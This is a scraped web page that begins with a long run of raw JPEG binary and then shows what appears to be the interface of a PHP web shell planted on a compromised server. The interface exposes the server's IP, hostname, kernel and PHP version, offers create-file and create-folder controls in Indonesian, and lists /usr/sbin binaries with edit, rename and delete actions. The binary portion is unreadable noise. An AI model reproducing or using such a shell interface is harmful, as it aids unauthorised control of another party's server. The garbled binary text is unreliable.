ÿØÿÛ C     %# , #&')*)-0-(0%()(ÿÛ C   (((((((((((((((((((((((((((((((((((((((((((((((((((ÿ     " ÿÄ     ÿÄ   ÿÚ   Õ@’@’hC‚é}!œ�¥Ñ°½Œ<"Í 9iׂIIIHk�+?ªc?³‚*YëµõøÔÃ!¯du)bèTÝ9вU÷$8G£ÉI.ªæ¾¬ÎïD³û×Sqæ qÌ}.<±ðZîl—V!X‡ *xö-´\À§«§t3i§Å¨ÐsNv71©Æ›\ìØz|tìLÞëð$¾–«”ô*f‘ÔkÊ®ÁÈ7òH;¸¿›~F%¥ '3Ñ@ÓHõq…` 9mOL³»«é/x@ @—ŸGd’8F¸Ù‡†âKaÖKdr•Fh.©]y4 JЛêù]éKåŒB“E$º©$ $ §PR�¥®΀ÉÀGÍ] ›‚u·i$�$�ÿÄ '    ! "#031ÿÚ  ýC/Td=S�Q?¹Œ‹62Ccj{ œù‘çÌ�dˆÚ†/cÔVÁ`þ›Wz͈÷{Y` d¦h¡L ©]OB§…íl¦ÕÊo¨Úîmr¥²õnà ë¿s-Ú—EZ¬°N©_åü1%bÅù„H†Ï£³¨§�¾ÚVÚ7):™Ó·)�}Î~˜(™;¬!»b1Æ5Kªë[E¦vÏ»>ìæq.%� ”�›OñªÞ(£cÃ#xà$¢'+Û¿`Ù¥vü—v(µ› ô—íM‰"Áv×ëB­�.¿a ÷ÿ ™TÕ~ÑÏ• –hy(6nݱlíÅ1yNÉ“x€—ø¥°¹ì•A RÆ8Œrqv1.cSÚ+õÁ_âþ¡&@éé ÝuÚM²5ÄˆŽ Xm÷öÎeLîX´qÕÍy#‹9]‡c®}É„L�ÊdÆeJ몓žËáI1TÁ d�ŽCaMë$¥–T¬,’X ábÊ­®!ž%F5½¦X1x#¨Š¶!‰qµí\ê†F§®2­ˆ&Rq‘�ùC‹ol~Ç̱Ù.0ϦL‘dû`.“„†³ùô ëÑüm{×Y~k{Cµ×}bv¸;U§Æc<är ÿ ~Éœs€1•j”«]W–líÍ*Õ¶CrÃã£QüN9 ö-„²¥­à�d¦ÅEØ›šÒnF¥“eÚ“©8(qÀÂ5UgRȱGTA•©*¡ÓûÙþ†Ì†››Vþç�°åÈð–Õ ezNŠÎhÃU]þT‘FG¾^“šæ<�«ayˆ,!‘ÆÛ5.¬ •uÓbΚ±V¯J%Íøm éDxn'ÓÙÒØì6–@BPaí`˜œHts‚ µÉ®À–ÀÅŽ«ZɬÛÜ%BûXµ±d5Z±ïñhC}ë•ä…¸±p+ k=ÕáÊ’(ÁaÕ�FG&Â%@/È{+ÑYu+…È£GÑ©"O%Œ |vȲxF>°N(úšou�h6 &Y5éß8¥7¯E$-ìâ']n,@TD\²ñ³”+Êãé½Ryþ UÒéU^™Q,f>ä×1ÝøòÆåq…¸f¸ÞU«�– µ�ÌõF¤óõÚ¥ØÍ>I€à×�ºfNUw“uõ�#OMMQ6ƒ NË*Óè_¥‹ kä ª§´ÆrSœ”`´óÓ1ò:þø !¶F'<+Ï ã b?OÿÄ 2    !Q12A�¡ð "3aÑᑱÁñ#$ÿÚ ?Ê,î7¸!`yÇ®(Ø1ëŠ6w …ýa¯ºÆš �FÝ#îþ?*"s†â¿év>»¾Èº×®äÛf†v©¬Í‘¹í¼sùü§°°ÐåìØØ]GnçüS ­³èÈ¥pG Ñ‹ñE×gª)Z©¬í�xÇ rYÞqø]§ @fþ_܃¤pÕ¹EÚŽÙ‘C –ñ²�ÚêÅœ*/ ÒhüOÙSv‘Ùˆ\´Ž5®ôUœ°yš«î§Ž|o®Hm2C°S»BWš’¢í) Ø5­æª{T–ƒWœ‘²=o*R A¿¤<³ÃöŒL0g4{ý»ì�¢Êep¿rw–8þ”7œÜU…Ùìt<Ԍѻ7»fGf…k}ØÀ÷ʚ㛆GÕ¼zõQ@Éã¤{Cš’'Gµ–8�!£S$új²”xßÖåœ|çëÝצV<°Ô,Üëâûu­kÈuušrMÐfï_dÏ£i ß«ñÔŸnš!K¨ˆ§Šmxu©=åæ§»¦'jõXðçð«þ˜�›»ŸÿÄ %    !A "1QR#BrÿÚ ?ÏR:¨ê£Rín‰b[¤II?#Àþ6<:Þ$gN˜�çŒÝlGNlrr÷œd×¢MMn`É¿yÑ,Á%B“eÑWëÙdVS¾¹r²”½� %âtT—‘(úÉ·Á“SÕ]îO]#’_LEMHNÖM‰äÝkvÈýÉ~Xäâ÷O6Ò׿U›V_èé£ÊÇÔbÃýäJ»tü774ýìÿÄ D     !1AQa"2q‘#3BRb�¡±á0’ÁÑð 4CSr‚ƒÂÒcst¢²ñÿÚ  ?û È^q½ëÎ7½dGÛUî "pì« ómozéâŸ'³‡n_x®Ž¼å”¹e†Á�ôþ«<6 ÿ §OÅt°¶óŠR>k¡Šs=œCrûÁˆe­?Ìi¹½ê¬ �²ÙÀ/—åÚº$beõ�›o`Þ®žGHyè; fNAl±8ÖÇ.ð\ÚS±‡¹íÚØ"ô¹Õa¥ÃºF²YvNkó-*`vÛkÕʈ2fæEE¦µWaä,¯ ¹fF^#Í;·Õ[9†Î^~ÁñÄðÀÑY$:0#W3Àõ¤æïÉZ*秆IœZàÚ¹´kûn--9=µãGˆÚ;7F)m{T±É†�Ð=÷ˆÁ¶ÃȬ5�5�Bë„aÚž5MŒ‚Ùî#mê5Ʀ‹�mÆ8À‚+Hh„÷Å$Ï}±:&ÚeãQÅ[;i]С×:¥:Ñóoä›®¨«$<~é æ5RBÏ?µs3Ü5¯rÙÂO‹°Ö¿Ôw¬P/­•Ì…¶ýœ(èZ6‘R>)îÂNý‰4·!ÊŠ¯wzÈ-ËrÌw+áyk¸´ q�1§bKhƸï4NÅÓ�ùX›í´îQÈÂ_‚¬})ú+e1¤5»únõ”q?Ïí[ã^ä9�<Àz3FsiÞ8…'ù)9p)î{­ñ†RPÝZ+Ñ*Ž÷p(aY½‘V»û“Î6lÁg“9¢£;׉¸d�u€²­Nt@Ü3ÑsTwzaŇÉGT‡b�HÖìœ(#ÜÎ*zcÚëÆ¶Æ©é9K‰b1²�Ÿ¢„t¦�äÑÊ�ñ ¼Z?gÖiDþÏÇHÖR¦­ ÜBŒ–‰^M¹ä™�µvðêÑOÿ ŒúLìD,'d‘q¨CÊPŠ©‹�å$Δ§ëUë•ÖŸÖŠ=¸sšßF¹$•¾J‹Þ‹Z?üNŒ¸ìí¸ÉÄÓAïNžWPˆï,àî ›Â¦ò™ˆ‰Õ&;Ãx»‚dupŒ¶í§ªi¡÷¦Ipd¡Æö;¤Ç…!ÃÜÖ¿Ñ®Ab%Ýu�÷}j›­-p¸Ü>Iî­[›N¥bi¼ÅûŠ Gý'·;4wÁm]Hú]ê÷µÏ#LÓ˜NN®žR·¢ñÏÁ’’ós….]¨–enô ý-ê8eÉÀPsåÛàÉQ¢²;¢ÎÔÈ›£EÒÝ«¨¾‰î�‚7“Ÿgê«_L»ïWáá�EZ:/ÉÕI„—¤aògÚnãÜ¤ŽšiÙ¹èæÞÅ·„Tèö�H~i®a¾¼è²÷ÕÖŽý~KV� ±Œ”ì A-2m]ÍF"¦m«9-Z bǰŠ×´ @¹»¨ë‡~¿4çNÑ[íUxÄ�·tl>ˆüÊØÆâu#r�gÑ�»3þäÜ;M9¡<éïš“J žˆàÝÞ1ÚvfL8µã׋�¹1×P�HgP¶Xv¶áÜÕ’�î¢{âëÔÜOÓ}®n ÇKQØ‹§Òç§7<”lëfey<ï}’>®bXÈàŸ4<`Y7¬ßæsiãÉV)îsô:—{”rOÖhêz ñ@4VWõB“ËŒ&¢í¤š�ÛóÉ¡ob Ü‹êƒFƒ÷4>yšsä®fXWSúNõO$ù,.u:µÔ«€©gÍyao4ÛÃ$hÐëD#…îÙ¸f^khà7¢#1ZÔÖ¥&ÊÚ×*Ôv-Œ²;bÞ­†•ôçQ‘ƒ©Ñáhïow¹y]žÙ‡.+Æ 7ëMÕâ´» ÓJYþ¯géfÎi3qýçK C®’3£Â¹·? 5¯Z.NåÍ^Z w‚žìKFÍ‚½©Æ7ìÈÞƒÛž­–wjŒ¹TçJ.Œq�Šé\Sv1U¢—ŒÀR›Üìš½&áN”ëÍÈpЖ`Œ`у‡Øm`vÎn#zÊÜ4‡Ñ>eÿ ñVâ˜`'×êžÇh¼˜¼�–' þjìAÒ”â±-”4:Hìµýn]9£h<Êën¦·œ»U˜6m­õ2cËE�1/æYÿ %µ™ÛI�¤~Ê� „|VBÆŸ@æÞåü;ãö°¯ û§%üM9M âŸÁ}âñ1þD¬±dÿ ÙÃþ%gäö±O»ÿ ]ñ© Àу&�r£ Ûfê7¹uܲìÿÄ (   !1AQaq�‘¡±ðÁÑ0ñ áÿÚ  ?!þŒ*êÖ@)€Je—Gû�jµ®{ª['Áúv+¿ñÄûÚüÒžü)¨ñò(È/õ¬ù¥Ð´%ì �ZŸÔkkÊL u¡Rmÿ µËj.c�ü�@Z  V´J«‡d©ûj€†æ–h6Ë�‘2AOÎï a;oBu¢ ¶¥Hò=œ€“nKÃW8«B¤É°Üu?¢ÿ бØ£m,©sr€¤‹ã|ø æã8˨i¼§qI2tZšÛ„JPÅÈXE�¹¢�™‚¸’zÞ”j~]UMuÀÈëŠózv!¸�Œ¡N¼&¥1§YÜÛzJöÕ ýÈ\p¶¬o'ሸ‘CØŠYÔüTD"HM5‡Ъ¦³i߯a†ÁÑF©¥²›A)¶Çê™çêÚ®Ûæ“êÔzÝE‹ö�@·hgåÖ�8‘1jk¹‰\ÜM†3¤8Ü¢úà �âš †ÿ Æs²7„¤ŒûN}éÞ­““æÀ±¸GN¥Bc‹†ã©L pkØ;ïJõδ3§eŽiUÈgAYW]\Ô>¤GyÚ¯Q=ƒ´fÐKA;T’a`eM+Q ÔÍ �Ln¨“ÈÌŒ]GMÒø¼‚’<ĦÀj»�­H² ÇN�M×xæ}aX{Ì£SØ ®›Ô…îßnúMAŠS¯rŒ ( ÏÁŽê (ÜLûîzo9¬ËÎ.Í;ÜÓ³fíÕÐ šƒ˜`Ó”Ù¢3šÕ IWíÅ\9~_¸§ƒsaaÞ\ÔŠWƒÜ­X:ˆ–ÆÓ†�38ùty*—•ºõN­qPÑÃÁ“BI­ Y�åjEìâ>DPä§!íR%-€�4ø¤'’皺;±è~JÖ!Ô7mîžô“Xå÷hÃP!æ›­ÄÞÛ$Í\†AYj‘.lCËð4Ñâ+žjD¡dgC0-*‹ÙÅ| ¡`ZDí+лßC"„°)”¥s¢è8Kqê…pq‹¦¯Ms»²4± ÄÆ7\U`’.þÔ[Ey8«ÒAH!/¡Í,çó�(:M -œTä“¥ª~ O¬4- ¼œÔ’ nþÔ}HDN7¢¢åK½©Ž$Ü_Ԕ䚞`ŠRœhBç_aX?4V´ŠÅ—‹@Ù‡ãŠuÓa³;‰{PcT+�Õ×èôåÚ7YBoƒ?¾¢r-Í©{ŸÄŽA±½ ¿¡ûè˼nº¯M286»âGŠŽû1�…ûVÎËœJв"låÄV5¡ä Å5ÍC]hêÁêÌŠÂAÇëÅ% å ­'p´Ô‚¸‹»Õ�¡˜9=˜dÂ=Ÿeª{®'<3Í_ ¾: ^£~ˆÇ4ˆ(˜nú-CÄs‘¢5m![ÈjmIqUÚ~šTw8’Þ`àÖå™píH8Àu—Д l mÿ aP’0‘µ÷µë £ƒ9yµŠÆÃCMŸÍF1G糞õ.·U~ÀÙ“¦´ûüFCïŠ{ÿ !e(Y¹:Á¶ºP´ÒúŽ7~;íLä‚N^{æ�1r©\¥ îÔ¬G(�ï£0dÆÃ�OóqKÝZú⑼ƒT÷{ 2¬òsþÒKdÍÕ�?mMQ¤œ=–¨Ú6›7¾i„á�°éH+›� Øóƒ9¢“dÂõ=– ;‡QؤH8n¶Lb¤D…ÎyS%É(³{b¤ºÝCuú·¡p‘t#C¿ÜÓ$A"ØH{¬®žjqᶯð:Òn=E‚ÃÇòhHÅ`ð!™mÔýMA½À˜¨ÈÇ?ªv6àäÞ+MԿ⟚q KÕi§Dž*Q5¨Î CZ™¬ò2„| ]ª:Xd+„t›:o@•²M Ó ©Ÿ :˜32‰Ýb‚õ«ñ[\5=ßÖµ7])÷|t©ëƒÏº—  ‹éwéBüÅ„—e�ªá«!`Ë:ÿ íI,±„9:Öö¤ãj@/a 8’Ÿò¬Š+<‰uÒ(T^Ûº~ªá2oEÊBà%b)ÙÙzÑâ¤Ý³Ú�·)�ÈiÛj¬¾&õÒFi`qr¦‚wƒ�ú7­@Ç÷P£¥ î3Z&<ÎmóSåCƒßî´­˜™7tìT¶¨žøÆ´¬q~JŽe÷r6ÓZ] rL÷šì¥Ù‡ñE17'¡x¿š´+[ ÜœTc6Ü/–†�òúWô`¤qpMJ�‚—N5^ªØÆïxï}{lÐFmÆ‘®›œÁ1‹oZ\�ŒËÓð /d£/6  ÁuÓ¸Å0elXuX;M ›Ò$M÷}mBèÎÐàØþ¤�Z%eŸº“3fòjsäÇʤO¿J~2üz±86Ÿ*PB¬É vÑÎ� Œ£e-îÉ.¥/š†LèOÿÚ    óÎ2üóÏ9ƒØÇ4}|‘ØT5Mßá�ÑhÃ�7ðF*äÆl+yâ‘�0€‚–ö:|žº=k[”d‰;|òÔ‰e§=wÏ<ñÝõÏ<ÿÄ '   !1AQaq�‘¡±ð ÁÑáñÿÚ ?øÍ5�ÚëØ)Ô(›�ì¾+>v¤ø¦²6&{ƒ°�Ǹ @ÝûÀ½MØõÂþ�v®”iA 6T'¯w«›hÕs €E}âxŸÁG&'gúá J~1qÏfãf‹Šÿ &ç”q˘™–�-îÎÔvYm ¯/i1 �Iºœ6ºéu,) Î#É,ôùƒÎ�Íl}*&`‹$‘ͬe»%‚w3ËxÐѤÀXcã¸DÙû执g¸å³•÷5B/�| $¶¿=è…î%8 aæå 2.l‚ c÷@G ¹ �\Ù/x[Ó©q¿]žv5?À±ÃñÑN|÷!îÔÙ\Þê,>¿À{¬"rç»/˜ü?ÿÄ &   !1QAa¡ð �ÑᑱÁñÿÚ ?ÄŠDòè‚­¿„ nv@ÒyÞ� (•³·¿¤IÂ…´Ïå ‡U - íëé b³mýE>î§Ž,€–1v!—dì&·´ œ›û&šæª”±5D¥&0P¦€Ô”ÐÍ’@ZÛÂ:†E"¢ QÉ¡`”>PH:~£OÄ ññóÖPš3WÛõ@hM¦Šk‚U’˜ \¢O‹öR¹õ€±Í¦â5Ê„ç,¹šf†|×ùrˆ† }јxo)€"+hµQK¹åÐ/ËÚ 0é`±5û{M~ÞÓ ÝÿÄ '   !1AQaq�‘¡0 ±ÑáÁðÿÚ  ?þ?´kØÅ#^†~®Gù�#V,úýô�ÕÅÂ#Z å1'ܤüÌÀ¸�ŸùÁà §~p�O%O‚OÎ\–që`ù~𠭣}ÌåE¿Å°5 –輸µduÓô¬ôx\í$—Òýs[� {T2t`B�Égq·4Z]bÆ 㛪–3,(@ ììöbAp¯r)9:@|b¬!rØg:N¢^ŸÉ…¨Çâ ªx_Ž\á”pm7Iüû0?>^kœ¡÷¼œëšü�wøŠ ¬|.Kð[sF@­]Gn*L …yOÛ l e�P ž.pî³ñ¥Ö�ëjµS  =ðʨ´×ŸQF ×"òÎ5zʼn‘ÓÂk¢*8¹u" ´ñÎöFgµÅÙ §cSyµV³þƒ§¨â¶Æ‡¯àN±þØ�(»¢—äÀ48hV·A×ÓŽ^‘Ø^ ÷¤¸jyBí úÖp"ªžŒòÓy]ºÄ¼lU‘(Ž7îU`3 p CGF'&ygýþ²ÿ Ö¬ oè¼z£Éïõš¹Xƒôν:à P"@ïG@x[ާo&MJ”$F.àá“òÀhi w;}ø/^͇q¾³™n•mNÛ/¦TQÜŸ ôÞ‡¥¾O1 \,}ÛàbQ #¯^S!)¶ò¶ŠXœ¤ç#GPÈ�Òt˜† c^\„½' }iIZáöúaô)«àòþŒ¤�¹zÿ †4ÍŠÂΞyï�ð˜¸48,ôïf�ÏÐ#“ž§·œKP!Jxë|wÙʆ‘¦àýáÈó´�‡üâÐí#¹ªZŸÁðö �ûïˆ< �~K írÞp&qH/;ÂR ò‹Ñææ²½ÿ +ÅE¾R¯ÀÄ~0v¨ÙÈV#Ê€ÚTÓòS(- Ú�ÚèBºyŸbÔC¹DŸ ®¼‚ëbêÐÓí¯‘ˆó8�Á~Œ= ’YÐͧ]äè@nåœâ„ ©M™k2…%Ó;Ë%,Ñr6ÔLRè…»?^åÄ;KŇ=á Ö„ “¸¼=`óÉ¥Çï/²Ž�¶z¥&€I{ ëÀ¥#Jâ¶ÀMˆ¦ÝCýæ}ÝH9^UJà,P ©ípS·€ìÉGßd69Ϭu�Ðñ%"ұˢP šýK¿"k)îÍ=úÏ9¿ €½Íü㇌,ú…OlišÇXzh� " – °ÊÞð†“ R€ Á^ýsŠîÁÉNÊk�™Q >Ñ63(‹¶øú ­ ­PQÑPy®þ™ã©3๯œ$f+WÕ›=4úÇ�`* ú—^ ²‹Eb°K¨tÙ6�¨^®û!Úç±·ëÈÈ­ÀèK{/;¹Lö‰ðp�xãàÏüÖ;a¬ÏØOÙ„z¨[ê.NP4Ñ]Gc´T¶v‹àìø~sg'LEDŠ¥]j®¢'¸G“]�6rYª µÈUPw°*OÍİՋi¡'8ÈÛ´ÿ #gýXx+=×eU6•R®€cÝ"ßu2õ¬~�?nÌyø;ÿ uœž3Ø'ÀÅ6ðfÞ î¡Áëñýb‡È߬MŽ$*¦øk&?6ÂÐ ¥*^1nµ¿²þÛŽz)<»ÓGzÀ ‰ ž ‚‹Å7÷€·ñYâ ±ñÛƒ)$A¯…2ÕL6¾ Õ¥ƒHÉ<ªršÑ#ʽ2ÂÜ O Û›R½†€z ·AƒˆXWÅÀ@´¬óÚùï Ç„ð¼’<ÃGÆ Ï¤ð¯^ÛË“iˆMøW–…ê6 òƒþ0²ôm){cÎ;ݧë>Rýa¨×ßá†}1²Ù¯%ê™EY2’Q‚šEp¢ã˜ð$ ­ªEÞÎqSÖî‹»”t#+xØ *Ãh§UIÜÎXM?¥'//ûÃa'êG àžò ¸”q@¯Ÿ©<Ÿ†zÊÆØŸÈ §‡ýcd‹›z¢Ë¬T_uœÑ®„–‹Š&�z¡k ¢Ón ]§a%œpy»ï`Qdßxcÿ Ôå—îƒõ”n·ë Îú*Œ�oTd‚;'já<¬!jÐæ ‚'æ‡(~ äÍ´WÑM  PÛmȘ¼Ç@Ö¨V+��Rž`ú$äŠ`Œ+@êèµ_[ÅkG™ïÞ‡PçëÞZh9¸R«àëƒ&5bò‚vµ±ÀZû‘•#p”&ýÔ±+½•8’etZ7GËüó;§ì¥@"Óe0ŠØç v7ƒ¼¨�?À±zÌ?_Òô‡_äq1ÜT€"üpÀËŽ/ U 6׌_‚Bî¶>ÆŒ0( ó‡Ð} G#­ž‹›ÜÅÈ¢×pô� ¼9¶É;/& `¥B&$è¼y÷�t(¶*zÒxàƒðӔޱ¨„àšSö?KÈ�3Ûö•{pé b � Û�-Èz܈֦�à6?<ûú›Ç¬P°NÀG àæ›´÷ ÷6ˆ/h»£ž„á0Z¡‚…øŠž”ÁçiÁ uaØøe‚*M'A© “xª¬v¢q.>’F­ oN{°ØQ”�ã«{gDžüLñð³u�‘=|æð¡ëO xNËÉ¿díž´q“8(ëÛEèUu‹Ó,ˆîO© t±DJ ±å­ÃÓ;×á†G°˜’†e©’¿CàÃV Y Zßõ ¡÷—T4 {ßìÀÔ(€Ó²'cÕtŠf Èw“c—jrÝeÞ³Ûm »#7,ë6ÝàBâE4QˆP».PÕ(&’±^{9H-ÖmÑo àåqßg1À€ð=™á²>pœ)/"p0!4Þm‚S6ú´FN¨�¦h ½ÌD ¤)¶äXdT ‚FؤZ⸚€k àòùHéc8vö <¸§ÐuœP‰Õ€ü°ô:ÃÄ_ØEN°á|€Ó›‘îu?-â/¦oöL hkÏܸ ”S¦;îRÄ«¹»€è¤T"û N�¡©åM�¾px7<ÎÀ j�$µÒ`ƒY)Pjh 5` K‹Q f‘4�Cæ­bX"ƒD¤›Ž;HDáZß9R b¡F)ËUAÔŒ¬ƒvù#�„H DÇ!{•²ïåäË>I¯ “`áÔ� i¯4Ü)t*öçÇLe¥_Ø�‡>ru­GEQg±®Ç”ct›ÑÅ�0®Úl6v�æÚdÏô   ªGG8ïÆév^º|˜#JyZPSOÀà® Y—CuAß�Á"€xž„è™OfHF@‰KÈVš!å°‘EÒ•]h˜ ¤‘[ö—¶)Ć.qàËßð*0I<8Á»^Ë6½}p” ^thoõ‚ži g²iÍÚ¬ÛDKˆŽìp, íÍ2­3ÂIÀá5åÃù‚ì“„OYë6s7Qs¥Ow^±w‘J/›Aâž°ÆžŽ�Ÿ€0ù©§ƒ€ðg(Õ„¬Åy ÔÄKÔ‡°ÛõÀQS�³?HÃóÙwáX�=æ¿ ÈÒžXú~‘…ÓQ=¢'ñ�øÐp?7 Œ@gó~œG­}Œr“àgèT?‡ÿÙ Default page
  • Your IP: 216.73.216.149
  • Server IP: 157.245.101.34
  • Server: Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
  • PHP Version: 7.4.33
  • Buat File | Buat Folder
  • Dir : ~/usr/sbin/
  • Name Size Permission Action
    ModemManager 1.83 MB -rwxr-xr-x Edit Rename Delete
    NetworkManager 2.95 MB -rwxr-xr-x Edit Rename Delete
    a2disconf 15.89 KB -rwxr-xr-x Edit Rename Delete
    a2dismod 15.89 KB -rwxr-xr-x Edit Rename Delete
    a2dissite 15.89 KB -rwxr-xr-x Edit Rename Delete
    a2enconf 15.89 KB -rwxr-xr-x Edit Rename Delete
    a2enmod 15.89 KB -rwxr-xr-x Edit Rename Delete
    a2ensite 15.89 KB -rwxr-xr-x Edit Rename Delete
    a2query 9.64 KB -rwxr-xr-x Edit Rename Delete
    aa-remove-unknown 3 KB -rwxr-xr-x Edit Rename Delete
    aa-status 8.63 KB -rwxr-xr-x Edit Rename Delete
    aa-teardown 0.14 KB -rwxr-xr-x Edit Rename Delete
    accessdb 14.38 KB -rwxr-xr-x Edit Rename Delete
    add-shell 0.84 KB -rwxr-xr-x Edit Rename Delete
    addgnupghome 3 KB -rwxr-xr-x Edit Rename Delete
    addgroup 36.9 KB -rwxr-xr-x Edit Rename Delete
    adduser 36.9 KB -rwxr-xr-x Edit Rename Delete
    agetty 67.38 KB -rwxr-xr-x Edit Rename Delete
    apache2 692.07 KB -rwxr-xr-x Edit Rename Delete
    apache2ctl 7.06 KB -rwxr-xr-x Edit Rename Delete
    apachectl 7.06 KB -rwxr-xr-x Edit Rename Delete
    apparmor_parser 1.46 MB -rwxr-xr-x Edit Rename Delete
    apparmor_status 8.63 KB -rwxr-xr-x Edit Rename Delete
    applygnupgdefaults 2.17 KB -rwxr-xr-x Edit Rename Delete
    arp 65.45 KB -rwxr-xr-x Edit Rename Delete
    arpd 78.27 KB -rwxr-xr-x Edit Rename Delete
    arptables 215.32 KB -rwxr-xr-x Edit Rename Delete
    arptables-nft 215.32 KB -rwxr-xr-x Edit Rename Delete
    arptables-nft-restore 215.32 KB -rwxr-xr-x Edit Rename Delete
    arptables-nft-save 215.32 KB -rwxr-xr-x Edit Rename Delete
    arptables-restore 215.32 KB -rwxr-xr-x Edit Rename Delete
    arptables-save 215.32 KB -rwxr-xr-x Edit Rename Delete
    aspell-autobuildhash 13.22 KB -rwxr-xr-x Edit Rename Delete
    atd 30.01 KB -rwxr-xr-x Edit Rename Delete
    avahi-daemon 138.51 KB -rwxr-xr-x Edit Rename Delete
    badblocks 34.32 KB -rwxr-xr-x Edit Rename Delete
    bcache-super-show 14.15 KB -rwxr-xr-x Edit Rename Delete
    biosdecode 27.2 KB -rwxr-xr-x Edit Rename Delete
    blkdeactivate 14.49 KB -rwxr-xr-x Edit Rename Delete
    blkdiscard 34.23 KB -rwxr-xr-x Edit Rename Delete
    blkid 118.26 KB -rwxr-xr-x Edit Rename Delete
    blkzone 70.23 KB -rwxr-xr-x Edit Rename Delete
    blockdev 66.23 KB -rwxr-xr-x Edit Rename Delete
    bridge 102.3 KB -rwxr-xr-x Edit Rename Delete
    cache_check 1.29 MB -rwxr-xr-x Edit Rename Delete
    cache_dump 1.29 MB -rwxr-xr-x Edit Rename Delete
    cache_metadata_size 1.29 MB -rwxr-xr-x Edit Rename Delete
    cache_repair 1.29 MB -rwxr-xr-x Edit Rename Delete
    cache_restore 1.29 MB -rwxr-xr-x Edit Rename Delete
    cache_writeback 1.29 MB -rwxr-xr-x Edit Rename Delete
    capsh 30.3 KB -rwxr-xr-x Edit Rename Delete
    cfdisk 102.59 KB -rwxr-xr-x Edit Rename Delete
    cgdisk 206.48 KB -rwxr-xr-x Edit Rename Delete
    chat 34.16 KB -rwxr-xr-x Edit Rename Delete
    chcpu 46.23 KB -rwxr-xr-x Edit Rename Delete
    check_forensic 0.93 KB -rwxr-xr-x Edit Rename Delete
    chgpasswd 66.2 KB -rwxr-xr-x Edit Rename Delete
    chmem 62.23 KB -rwxr-xr-x Edit Rename Delete
    chpasswd 58.2 KB -rwxr-xr-x Edit Rename Delete
    chroot 42.34 KB -rwxr-xr-x Edit Rename Delete
    cpgr 60.34 KB -rwxr-xr-x Edit Rename Delete
    cppw 60.34 KB -rwxr-xr-x Edit Rename Delete
    crda 9.99 KB -rwxr-xr-x Edit Rename Delete
    cron 54.63 KB -rwxr-xr-x Edit Rename Delete
    cryptdisks_start 1.51 KB -rwxr-xr-x Edit Rename Delete
    cryptdisks_stop 0.82 KB -rwxr-xr-x Edit Rename Delete
    cryptsetup 135.54 KB -rwxr-xr-x Edit Rename Delete
    cryptsetup-reencrypt 105.32 KB -rwxr-xr-x Edit Rename Delete
    ctrlaltdel 38.23 KB -rwxr-xr-x Edit Rename Delete
    dbconfig-generate-include 12.37 KB -rwxr-xr-x Edit Rename Delete
    dbconfig-load-include 5.57 KB -rwxr-xr-x Edit Rename Delete
    debugfs 225.8 KB -rwxr-xr-x Edit Rename Delete
    delgroup 16.11 KB -rwxr-xr-x Edit Rename Delete
    deluser 16.11 KB -rwxr-xr-x Edit Rename Delete
    depmod 170.34 KB -rwxr-xr-x Edit Rename Delete
    devlink 150.47 KB -rwxr-xr-x Edit Rename Delete
    dhclient 508.98 KB -rwxr-xr-x Edit Rename Delete
    dhclient-script 15.92 KB -rwxr-xr-x Edit Rename Delete
    dmeventd 50.23 KB -rwxr-xr-x Edit Rename Delete
    dmidecode 119 KB -rwxr-xr-x Edit Rename Delete
    dmsetup 171.02 KB -rwxr-xr-x Edit Rename Delete
    dmstats 171.02 KB -rwxr-xr-x Edit Rename Delete
    dnsmasq 465.06 KB -rwxr-xr-x Edit Rename Delete
    dosfsck 58.08 KB -rwxr-xr-x Edit Rename Delete
    dosfslabel 54.08 KB -rwxr-xr-x Edit Rename Delete
    dpkg-preconfigure 3.58 KB -rwxr-xr-x Edit Rename Delete
    dpkg-reconfigure 4.34 KB -rwxr-xr-x Edit Rename Delete
    dumpe2fs 30.38 KB -rwxr-xr-x Edit Rename Delete
    e2freefrag 18.38 KB -rwxr-xr-x Edit Rename Delete
    e2fsck 327.21 KB -rwxr-xr-x Edit Rename Delete
    e2image 42.38 KB -rwxr-xr-x Edit Rename Delete
    e2label 106.55 KB -rwxr-xr-x Edit Rename Delete
    e2mmpstatus 30.38 KB -rwxr-xr-x Edit Rename Delete
    e2scrub 7.13 KB -rwxr-xr-x Edit Rename Delete
    e2scrub_all 5.27 KB -rwxr-xr-x Edit Rename Delete
    e2undo 22.38 KB -rwxr-xr-x Edit Rename Delete
    e4crypt 30.38 KB -rwxr-xr-x Edit Rename Delete
    e4defrag 34.3 KB -rwxr-xr-x Edit Rename Delete
    ebtables 215.32 KB -rwxr-xr-x Edit Rename Delete
    ebtables-nft 215.32 KB -rwxr-xr-x Edit Rename Delete
    ebtables-nft-restore 215.32 KB -rwxr-xr-x Edit Rename Delete
    ebtables-nft-save 215.32 KB -rwxr-xr-x Edit Rename Delete
    ebtables-restore 215.32 KB -rwxr-xr-x Edit Rename Delete
    ebtables-save 215.32 KB -rwxr-xr-x Edit Rename Delete
    era_check 1.29 MB -rwxr-xr-x Edit Rename Delete
    era_dump 1.29 MB -rwxr-xr-x Edit Rename Delete
    era_invalidate 1.29 MB -rwxr-xr-x Edit Rename Delete
    era_restore 1.29 MB -rwxr-xr-x Edit Rename Delete
    escapesrc 22.47 KB -rwxr-xr-x Edit Rename Delete
    ethtool 375.05 KB -rwxr-xr-x Edit Rename Delete
    faillock 14.15 KB -rwxr-xr-x Edit Rename Delete
    fatlabel 54.08 KB -rwxr-xr-x Edit Rename Delete
    fdformat 34.23 KB -rwxr-xr-x Edit Rename Delete
    fdisk 150.27 KB -rwxr-xr-x Edit Rename Delete
    filefrag 18.33 KB -rwxr-xr-x Edit Rename Delete
    findfs 14.23 KB -rwxr-xr-x Edit Rename Delete
    fixparts 74.48 KB -rwxr-xr-x Edit Rename Delete
    fsadm 23.54 KB -rwxr-xr-x Edit Rename Delete
    fsck 54.27 KB -rwxr-xr-x Edit Rename Delete
    fsck.btrfs 1.16 KB -rwxr-xr-x Edit Rename Delete
    fsck.cramfs 38.26 KB -rwxr-xr-x Edit Rename Delete
    fsck.ext2 327.21 KB -rwxr-xr-x Edit Rename Delete
    fsck.ext3 327.21 KB -rwxr-xr-x Edit Rename Delete
    fsck.ext4 327.21 KB -rwxr-xr-x Edit Rename Delete
    fsck.fat 58.08 KB -rwxr-xr-x Edit Rename Delete
    fsck.minix 122.25 KB -rwxr-xr-x Edit Rename Delete
    fsck.msdos 58.08 KB -rwxr-xr-x Edit Rename Delete
    fsck.vfat 58.08 KB -rwxr-xr-x Edit Rename Delete
    fsck.xfs 1.92 KB -rwxr-xr-x Edit Rename Delete
    fsfreeze 14.23 KB -rwxr-xr-x Edit Rename Delete
    fstab-decode 14.3 KB -rwxr-xr-x Edit Rename Delete
